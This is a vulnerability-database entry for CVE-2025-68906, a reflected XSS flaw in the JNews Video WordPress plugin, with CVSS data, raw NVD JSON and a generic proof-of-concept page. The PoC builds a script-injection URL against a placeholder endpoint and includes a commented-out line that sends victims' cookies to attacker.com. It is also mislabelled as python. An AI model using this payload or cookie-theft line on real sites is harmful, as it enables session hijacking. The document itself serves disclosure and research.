Security Vulnerability Report
中文
CVE-2025-68906 CVSS 7.1 HIGH

CVE-2025-68906

Published: 2026-01-22 17:16:14
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS.This issue affects JNews - Video: from n/a through <= 11.0.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

jnews-video <= 11.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68906 PoC: Reflected XSS in JNews Video Plugin --> <!-- Target: WordPress site with jnews-video plugin <= 11.0.2 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-68906 PoC</title> </head> <body> <h1>Reflected XSS PoC for CVE-2025-68906</h1> <p>JNews Video Plugin <= 11.0.2</p> <h2>Malicious URL:</h2> <code id="malicious-url"></code> <h2>Attack Scenario:</h2> <ol> <li>Attacker crafts a URL with XSS payload in vulnerable parameter</li> <li>Victim is tricked into clicking the malicious link</li> <li>Server reflects the unsanitized input back to victim's browser</li> <li>Browser executes the injected JavaScript</li> <li>Attacker steals session cookies or performs actions on behalf of victim</li> </ol> <script> // Example payload - actual vulnerable parameter needs to be identified const baseUrl = window.location.origin; const vulnerableEndpoint = '/wp-json/jnews-video/v1/...'; const xssPayload = '<script>alert("XSS")</script>'; // Generate malicious URL const maliciousUrl = `${baseUrl}${vulnerableEndpoint}?param=${encodeURIComponent(xssPayload)}`; document.getElementById('malicious-url').textContent = maliciousUrl; // Log for testing console.log('CVE-2025-68906 PoC URL:', maliciousUrl); // Simulate cookie stealing (for educational purposes only) // document.location='https://attacker.com/steal?cookie='+document.cookie; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68906", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:14.487", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS.This issue affects JNews - Video: from n/a through <= 11.0.2."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en jegtheme JNews - Video jnews-video permite XSS Reflejado. Este problema afecta a JNews - Video: desde n/a hasta &lt;= 11.0.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jnews-video/vulnerability/wordpress-jnews-video-plugin-11-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}